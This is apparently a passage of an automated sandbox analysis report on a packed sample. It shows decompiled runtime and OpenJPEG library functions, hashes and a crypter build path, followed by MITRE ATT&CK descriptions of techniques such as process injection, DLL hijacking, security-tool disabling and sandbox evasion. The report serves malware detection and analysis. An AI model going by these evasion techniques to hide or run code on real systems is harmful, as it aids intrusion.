			}

APIs

GetLastError.KERNEL32(?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?,?,6EDB28E8,?), ref: 6EE444CF
_free.LIBCMT ref: 6EE4452C
_free.LIBCMT ref: 6EE44562
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?), ref: 6EE4456D

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6b13beae8e9b0da2ec25177195d7f158a39725f8554d8507c612c46c79c11863
Instruction ID: bdf36e7838a2c9ecf35eb4706f32c64c5c6c9fadb2463a4b0e3612ccf1db45b7
Opcode Fuzzy Hash: 6b13beae8e9b0da2ec25177195d7f158a39725f8554d8507c612c46c79c11863
Instruction Fuzzy Hash: 8C11A736318917EE9F416DF6BC94D5A2A9E9BC26BDB34062AF624963C0EF658C038110

Uniqueness

Uniqueness Score: -1.00%

Function 6EE44621, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EE44621(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x6ee77be0; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6EE44DA2(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6EE447A4(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6EE44DA2(__eflags,  *0x6ee77be0, _t18);
							if(__eflags != 0) {
								E6EE442CC(_t18, 0x6ee79584);
								E6EE4471C(0);
								goto L13;
							} else {
								_t13 = 0;
								E6EE44DA2(__eflags,  *0x6ee77be0, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6EE44DA2(0,  *0x6ee77be0, 0);
							_push(0);
							L9:
							E6EE4471C();
							goto L4;
						}
					}
				} else {
					_t18 = E6EE44D63(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6ee77be0; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

APIs

GetLastError.KERNEL32(?,00000000,?,6EE42017,6EE44799,?,?,6EE3612D,00000000,?,6EDB211C,00000000,?,6EDB1379,00000000), ref: 6EE44626
_free.LIBCMT ref: 6EE44683
_free.LIBCMT ref: 6EE446B9
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,6EE42017,6EE44799,?,?,6EE3612D,00000000,?,6EDB211C,00000000), ref: 6EE446C4

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 94e9cce2f5e79b492077ff424056a022b5a2dacdf78a577ea0e8a1506ed8a1f8
Instruction ID: a35d3de6afbd846d8583ab1e3e2cca1529a44bddc18ac96b276b897b2bb4ae78
Opcode Fuzzy Hash: 94e9cce2f5e79b492077ff424056a022b5a2dacdf78a577ea0e8a1506ed8a1f8
Instruction Fuzzy Hash: 39118A35314512EEDF415DFABC94E562AAE9BC26BDB35076BF524923D0DFB18C078110

Uniqueness

Uniqueness Score: -1.00%

Function 6EE5508F, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE5508F(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6ee784b0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6EE55078();
					E6EE5503A();
					_t13 = WriteConsoleW( *0x6ee784b0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6ee550ac
0x6ee550b0
0x6ee550bd
0x6ee550c2
0x6ee550dd
0x6ee550dd
0x6ee550e3

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6EE53948,00000000,00000001,00000000,00000000,?,6EE4A5DF,?,?,00000000), ref: 6EE550A6
GetLastError.KERNEL32(?,6EE53948,00000000,00000001,00000000,00000000,?,6EE4A5DF,?,?,00000000,?,00000000,?,6EE4AB2B,?), ref: 6EE550B2

Part of subcall function 6EE55078: CloseHandle.KERNEL32(FFFFFFFE,6EE550C2,?,6EE53948,00000000,00000001,00000000,00000000,?,6EE4A5DF,?,?,00000000,?,00000000), ref: 6EE55088

___initconout.LIBCMT ref: 6EE550C2

Part of subcall function 6EE5503A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EE55069,6EE53935,00000000,?,6EE4A5DF,?,?,00000000,?), ref: 6EE5504D

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6EE53948,00000000,00000001,00000000,00000000,?,6EE4A5DF,?,?,00000000,?), ref: 6EE550D7

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 24b38fc72cb5a5929e30c35b57df7a82f7a45a39d48ebfd5f4ecfde9c9de0b63
Instruction ID: 1335593b022fca43c4c0663502122115313b7d38b853c76e85ddd61f82df22de
Opcode Fuzzy Hash: 24b38fc72cb5a5929e30c35b57df7a82f7a45a39d48ebfd5f4ecfde9c9de0b63
Instruction Fuzzy Hash: 36F01536010668BBCF621FD5CC0898A3F66FB0A3A5F208014FA1A95228D7738930DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4DDBE, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6EE4DDBE(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __fp0, char _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				signed int _t60;
				char _t63;
				char _t68;
				signed char _t69;
				signed int _t70;
				signed int _t80;
				char _t85;
				signed int _t88;
				signed char _t89;
				char _t90;
				signed int _t91;
				void* _t92;
				intOrPtr _t98;
				signed int _t101;
				signed int _t103;
				void* _t116;

				_t116 = __fp0;
				_t91 = __edx;
				_t101 = _t103;
				_t60 =  *0x6ee77a68; // 0xa89efc87
				_v8 = _t60 ^ _t101;
				_t2 =  &_a4; // 0x6ee4e1e3
				_t98 =  *_t2;
				if( *(_t98 + 4) == 0xfde9 || GetCPInfo( *(_t98 + 4),  &_v1820) == 0) {
					__eflags = 0;
					_t85 = 0;
					do {
						_t46 = _t85 - 0x61; // -97
						_t92 = _t46;
						_t47 = _t92 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t92 - 0x19;
							if(_t92 > 0x19) {
								_t63 = 0;
							} else {
								 *(_t98 + _t85 + 0x19) =  *(_t98 + _t85 + 0x19) | 0x00000020;
								_t56 = _t85 - 0x20; // -32
								_t63 = _t56;
							}
						} else {
							 *(_t98 + _t85 + 0x19) =  *(_t98 + _t85 + 0x19) | 0x00000010;
							_t52 = _t85 + 0x20; // 0x20
							_t63 = _t52;
						}
						 *((char*)(_t98 + _t85 + 0x119)) = _t63;
						_t85 = _t85 + 1;
						__eflags = _t85 - 0x100;
					} while (_t85 < 0x100);
					goto L27;
				} else {
					_t68 = 0;
					do {
						 *((char*)(_t101 + _t68 - 0x104)) = _t68;
						_t68 = _t68 + 1;
					} while (_t68 < 0x100);
					_t69 = _v1814;
					_t88 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t112 = _t69;
						if(_t69 == 0) {
							break;
						}
						_t91 =  *(_t88 + 1) & 0x000000ff;
						_t70 = _t69 & 0x000000ff;
						while(1) {
							__eflags = _t70 - _t91;
							if(_t70 > _t91) {
								break;
							}
							__eflags = _t70 - 0x100;
							if(_t70 >= 0x100) {
								break;
							}
							 *((char*)(_t101 + _t70 - 0x104)) = 0x20;
							_t70 = _t70 + 1;
							__eflags = _t70;
						}
						_t88 = _t88 + 2;
						__eflags = _t88;
						_t69 =  *_t88;
					}
					E6EE4C37D(0, _t91, 0x100, _t98, _t112, _t116, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t98 + 4), 0);
					E6EE4C66A(0, 0x100, _t98, _t112, _t116, 0,  *((intOrPtr*)(_t98 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t98 + 4), 0);
					E6EE4C66A(0, 0x100, _t98, _t112, _t116, 0,  *((intOrPtr*)(_t98 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t98 + 4), 0);
					_t80 = 0;
					do {
						_t89 =  *(_t101 + _t80 * 2 - 0x704) & 0x0000ffff;
						if((_t89 & 0x00000001) == 0) {
							__eflags = _t89 & 0x00000002;
							if((_t89 & 0x00000002) == 0) {
								_t90 = 0;
							} else {
								 *(_t98 + _t80 + 0x19) =  *(_t98 + _t80 + 0x19) | 0x00000020;
								_t90 =  *((intOrPtr*)(_t101 + _t80 - 0x304));
							}
						} else {
							 *(_t98 + _t80 + 0x19) =  *(_t98 + _t80 + 0x19) | 0x00000010;
							_t90 =  *((intOrPtr*)(_t101 + _t80 - 0x204));
						}
						 *((char*)(_t98 + _t80 + 0x119)) = _t90;
						_t80 = _t80 + 1;
					} while (_t80 < 0x100);
					L27:
					return E6EE361A7(_v8 ^ _t101);
				}
			}

APIs

GetCPInfo.KERNEL32(0000FDE9,?,?,?,00000000), ref: 6EE4DDF0

Strings

n, xrefs: 6EE4DDD5
, xrefs: 6EE4DE35

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID: $n
API String ID: 1807457897-70956054
Opcode ID: 954e55f1969a6d451da33416478b1f083e823396df6823cbee93811ca5efda0b
Instruction ID: db7df119ad3557821f3acfb87025578ea0f05728c5b4bf1f7e2c60c626eed3fb
Opcode Fuzzy Hash: 954e55f1969a6d451da33416478b1f083e823396df6823cbee93811ca5efda0b
Instruction Fuzzy Hash: 3E4149B5A04258DEEB218AD8D894BE67BFDEB55708F3004ADE58A87142D231AA45CF10

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4C37D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6EE4C37D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4, int _a8, intOrPtr _a12, intOrPtr _a16, short* _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				void* _v44;
				signed int _t30;
				signed int _t36;
				signed int _t40;
				int _t43;
				intOrPtr _t56;
				int _t58;
				short* _t60;
				signed int _t61;
				void* _t62;
				short* _t63;

				_t30 =  *0x6ee77a68; // 0xa89efc87
				_v8 = _t30 ^ _t61;
				E6EE3B82D( &_v32, __edx, __fp0, _a4);
				_t48 = _a24;
				if(_a24 == 0) {
					_t48 =  *((intOrPtr*)(_v28 + 8));
				}
				_t58 = 0;
				_t36 = E6EE4D1B6(_t48, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_t63 = _t62 + 0x18;
				_v16 = _t36;
				if(_t36 == 0) {
					L16:
					if(_v20 != 0) {
						 *(_v32 + 0x350) =  *(_v32 + 0x350) & 0xfffffffd;
					}
					return E6EE361A7(_v8 ^ _t61);
				} else {
					_t56 = _t36 + _t36;
					_v12 = _t56;
					asm("sbb eax, eax");
					_t40 = _t36 & _t56 + 0x00000008;
					if(_t40 == 0) {
						_t60 = 0;
						L12:
						if(_t60 != 0) {
							E6EE38EC0(_t58, _t60, _t58, _t56);
							_t43 = E6EE4D1B6(_t48, 1, _a12, _a16, _t60, _v16);
							if(_t43 != 0) {
								_t58 = GetStringTypeW(_a8, _t60, _t43, _a20);
							}
						}
						E6EE35FB5(_t60);
						goto L16;
					}
					if(_t40 > 0x400) {
						_t60 = E6EE44756(_t40);
						if(_t60 == 0) {
							L10:
							_t56 = _v12;
							goto L12;
						}
						 *_t60 = 0xdddd;
						L9:
						_t60 =  &(_t60[4]);
						goto L10;
					}
					E6EE37060();
					_t60 = _t63;
					if(_t60 == 0) {
						goto L10;
					}
					 *_t60 = 0xcccc;
					goto L9;
				}
			}

APIs

GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,0000FDE9), ref: 6EE4C44D
__freea.LIBCMT ref: 6EE4C456

Part of subcall function 6EE44756: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,6EE3612D,00000000,?,6EDB211C,00000000,?,6EDB1379,00000000), ref: 6EE44788

Strings

n, xrefs: 6EE4C390

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeapStringType__freea
String ID: n
API String ID: 4073780324-2987474338
Opcode ID: b30e6bf9adedcd64f0c9744e4d4b20cf90c986c12a578a44a5673595e3b452b6
Instruction ID: f78c1d9bb0c64eb304836248e81153680467f79674ca7f5d1dc7127295c38e20
Opcode Fuzzy Hash: b30e6bf9adedcd64f0c9744e4d4b20cf90c986c12a578a44a5673595e3b452b6
Instruction Fuzzy Hash: 6631CF72A1021AEBEB108FE5EC44EFF7BB8EF44358F204528E8149B240DB349955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EE40C41, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6EE40C41(long _a4) {
				void* _t4;
				void* _t13;
				long _t16;

				_pop(_t18);
				_t13 = _a4;
				if(_t13 != 0) {
					_t16 = _a4;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(__eflags <= 0) {
							while(1) {
								_t4 = HeapReAlloc( *0x6ee796a4, 0, _t13, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E6EE4ECA6();
								if(__eflags == 0) {
									goto L6;
								} else {
									__eflags = E6EE42BF8(__eflags, _t16);
									if(__eflags == 0) {
										goto L6;
									} else {
										continue;
									}
								}
								L14:
							}
						} else {
							L6:
							 *((intOrPtr*)(E6EE42012(__eflags))) = 0xc;
							goto L7;
						}
					} else {
						E6EE4471C(_t13);
						L7:
						_t4 = 0;
						__eflags = 0;
					}
				} else {
					_t4 = E6EE44756(_a4);
				}
				return _t4;
				goto L14;
			}

APIs

_free.LIBCMT ref: 6EE4AC70

Part of subcall function 6EE44756: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,6EE3612D,00000000,?,6EDB211C,00000000,?,6EDB1379,00000000), ref: 6EE44788

HeapReAlloc.KERNEL32(00000000,?,00000000,Created by OpenJPEG version ,00000000,?,6EE2058A,?,00000000), ref: 6EE4ACAC

Strings

Created by OpenJPEG version , xrefs: 6EE4AC67

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocAllocate_free
String ID: Created by OpenJPEG version
API String ID: 2447670028-2177341080
Opcode ID: 45ec8fbc407589f4bde8ec1956e7d126bbd39cafdfe39fce6f59781f7e76fb77
Instruction ID: c43da1e80487a42fbe7780d8ce6f7404c24f81e6433fc18101da61b44014d53a
Opcode Fuzzy Hash: 45ec8fbc407589f4bde8ec1956e7d126bbd39cafdfe39fce6f59781f7e76fb77
Instruction Fuzzy Hash: 6DF0F4326D4116EB9B911AEA7C04FAB375D9FD36B5F32053EE81C9B290FF21D40281A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCB200, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6EDCB200(void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v40;
				char _v64;
				void* _t21;
				intOrPtr _t36;
				void* _t37;

				_push(0xffffffff);
				_push(0x6ee56155);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t36;
				_t37 = _t36 - 0x30;
				E6EDB18A0( &_v40, __eflags, 0x6ee572d8);
				_v8 = 0;
				_t40 = _a4 - 0x20;
				if(_a4 != 0x20) {
					E6EDB12B0(_t40,  &_v64,  &_v40, 0x6ee572dc);
					_t37 = _t37 + 0xc;
					_v8 = 1;
					E6EE3AAA4(1);
					E6EDB1FB0( &_v40,  &_v64);
					_v8 = 0;
					E6EDB1D80( &_v64);
				}
				E6EDB30F0( &_v40);
				_push(E6EDB2660( &_v40));
				E6EDB1340(_t19);
				_v8 = 0xffffffff;
				_t21 = E6EDB1D80( &_v40);
				 *[fs:0x0] = _v16;
				return _t21;
			}

APIs

task.LIBCPMTD ref: 6EDCB268
task.LIBCPMTD ref: 6EDCB290

Strings

, xrefs: 6EDCB22F

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-3916222277
Opcode ID: 8c57adf827b541a399ac669332ee14cd188a99c4e4d4a82a6b59f1a752ce88b8
Instruction ID: 68406d25010fce473fac7954f5e602aeae1954729de0bdae9e6686805fe01184
Opcode Fuzzy Hash: 8c57adf827b541a399ac669332ee14cd188a99c4e4d4a82a6b59f1a752ce88b8
Instruction Fuzzy Hash: 88115EB6C10148ABCB04DBD4DA41BDDB7B8AF14648F204AA8E416672D0EB756A08C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDDEF50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E6EDDEF50(void* __ebx, void* __edx, void* __edi, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				void* _t14;
				void* _t16;

				_t14 = __edx;
				_t20 = _a8;
				if(_a8 == 0) {
					_push(0xa2);
					E6EE3EEBE(__ebx, __edx, __edi, _t16, _t20, __fp0, "b", L"Z:\\cr\\crypter4\\ballast\\3\\openjp2\\opj_intmath.h");
				}
				asm("cdq");
				asm("cdq");
				asm("adc esi, edx");
				asm("sbb esi, 0x0");
				asm("cdq");
				return E6EE36450(_a4 + _a8 - 1, _t14, _a8, _t14);
			}

0x6eddef50
0x6eddef54
0x6eddef58
0x6eddef5a
0x6eddef69
0x6eddef6e
0x6eddef74
0x6eddef7c
0x6eddef7f
0x6eddef84
0x6eddef8a
0x6eddef96

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EDDEF8F

Strings

Z:\cr\crypter4\ballast\3\openjp2\opj_intmath.h, xrefs: 6EDDEF5F
Created by OpenJPEG version , xrefs: 6EDDEF53

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: Created by OpenJPEG version $Z:\cr\crypter4\ballast\3\openjp2\opj_intmath.h
API String ID: 885266447-1835207418
Opcode ID: 4c6022794ce31d199e422de2ac05e30e9b900a4c71749524282ce387323ad930
Instruction ID: 71695c5c6e39c99068475d6120310346a6e423970a8f6a99b56a7ba81416d0ce
Opcode Fuzzy Hash: 4c6022794ce31d199e422de2ac05e30e9b900a4c71749524282ce387323ad930
Instruction Fuzzy Hash: 59E09271A40128BBCB049AADC805FA937AD9B44638F10C134F91C9A250D232DD4446A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCC030, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6EDCC030(intOrPtr __ecx, char _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t18;

				_push(0xffffffff);
				_push(0x6ee5619d);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t18;
				_push(__ecx);
				_v20 = __ecx;
				_t2 =  &_a4; // 0x6ee572e0
				E6EDB3590(_v20,  *_t2);
				_v8 = 0;
				E6EDCC7A0(_v20);
				_v8 = 0xffffffff;
				 *[fs:0x0] = _v16;
				return _v20;
			}

0x6edcc033
0x6edcc035
0x6edcc040
0x6edcc041
0x6edcc048
0x6edcc049
0x6edcc04c
0x6edcc053
0x6edcc058
0x6edcc062
0x6edcc067
0x6edcc074
0x6edcc07e

APIs

Concurrency::details::SweeperContext::SweeperContext.LIBCMTD ref: 6EDCC053

Part of subcall function 6EDCC7A0: allocator.LIBCONCRTD ref: 6EDCC7B8

Strings

rn, xrefs: 6EDCC04C, 6EDCC04F
rn, xrefs: 6EDCC040

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Sweeper$Concurrency::details::ContextContext::allocator
String ID: rn$rn
API String ID: 1818788282-2305765957
Opcode ID: d1be60d134a0d44291524747f492873c484c6b68b9842e8989826ccaec3b8641
Instruction ID: 4e22e256934dc2d351712dcd513e2d7134192422dfaf1074a6449bc819099e6c
Opcode Fuzzy Hash: d1be60d134a0d44291524747f492873c484c6b68b9842e8989826ccaec3b8641
Instruction Fuzzy Hash: FBF039B1904649EBCB14CF88CD44BAEB7B8FB08760F104B29F425977C0C7356900CBA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

